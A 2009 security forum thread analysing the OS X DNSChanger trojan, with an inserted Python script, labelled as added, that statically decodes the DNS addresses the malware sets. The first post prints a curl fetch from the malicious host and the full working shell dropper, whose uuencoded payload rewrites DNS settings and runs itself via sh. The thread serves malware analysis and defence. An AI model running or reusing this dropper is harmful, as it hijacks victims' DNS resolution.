Author Topic: hs.2-109.zlkon.lv - (94.247.2.109)  (Read 11872 times)


April 18, 2009, 04:43:25 am

MarcusB

  • Guest
OSX version of DNSChanger contacts "94.247.2.109" with User-Agent "i386;0;7777;my_hostname;" to download another shell script at "/cgi-bin/generator.pl", which contains the IPs that the host's DNS server IPs are changed to.

http://www.virustotal.com/analisis/00b8a659101f9a3446a6d88f1379ff31


Quote
curl -A 'i386;0;7777;my_hostname;' 94.247.2.109/cgi-bin/generator.pl
#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end
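A static way to recover the DNS server addresses that this generator.pl output would splice into the uudecoded payload, without running anything (added example, not part of the thread; the sample is the decoder line quoted above, embedded as a constructed string, and the regex assumes exactly the sed/echo/tr shape seen there):

```python
import ipaddress
import re

# Constructed sample: the decoder line from the generator.pl output quoted above.
DROPPER_LINE = r"""tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit"""

# Matches one  sed 's/PLACEHOLDER/'`echo TOKEN | tr FROM TO`'/'  substitution
# (assumed shape; other samples may obfuscate differently).
SUBST_RE = re.compile(r"sed 's/(\w+)/'`echo ([\w.]+) \| tr (\w+) (\w+)`'/'")


def decode_tr(token: str, src: str, dst: str) -> str:
    """Apply the same character mapping tr(1) would: src[i] -> dst[i]."""
    if len(src) != len(dst):
        raise ValueError("tr sets differ in length; decode would be ambiguous")
    return token.translate(str.maketrans(src, dst))


def extract_dns_servers(script: str) -> dict:
    """Return {placeholder: ip} for every obfuscated value the script
    would substitute into the uudecoded payload before piping it to sh."""
    servers = {}
    for placeholder, token, src, dst in SUBST_RE.findall(script):
        value = decode_tr(token, src, dst)
        ipaddress.IPv4Address(value)  # raises if the decode is not a valid IPv4 address
        servers[placeholder] = value
    return servers


if __name__ == "__main__":
    # The placeholders are the strings the payload's scutil block passes to
    # "d.add ServerAddresses", so these are the resolvers the host would be pointed at.
    for name, ip in extract_dns_servers(DROPPER_LINE).items():
        print(f"{name} -> {ip}")
```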

April 20, 2009, 10:37:00 am
Reply #1

Serg

  • Special Members
  • Sr. Member

In the script the DNS servers are
Code:
85.255.112.130
85.255.112.170
Could you provide a link (maybe VirusTotal) to "install.pkg"?

April 20, 2009, 10:41:18 am
Reply #2

SysAdMini

  • Administrator
  • Hero Member

Quote from: Serg
In the script the DNS servers are
Code:
85.255.112.130
85.255.112.170
Could you provide a link (maybe VirusTotal) to "install.pkg"?

Are you looking for the OSX DNSChanger?

http://www.malwaredomainlist.com/mdl.php?search=MAC+OSX%2FRSPlug-F&colsearch=All&quantity=50
Ruining the bad guy's day


April 20, 2009, 08:17:45 pm
Reply #4

Serg

  • Special Members
  • Sr. Member
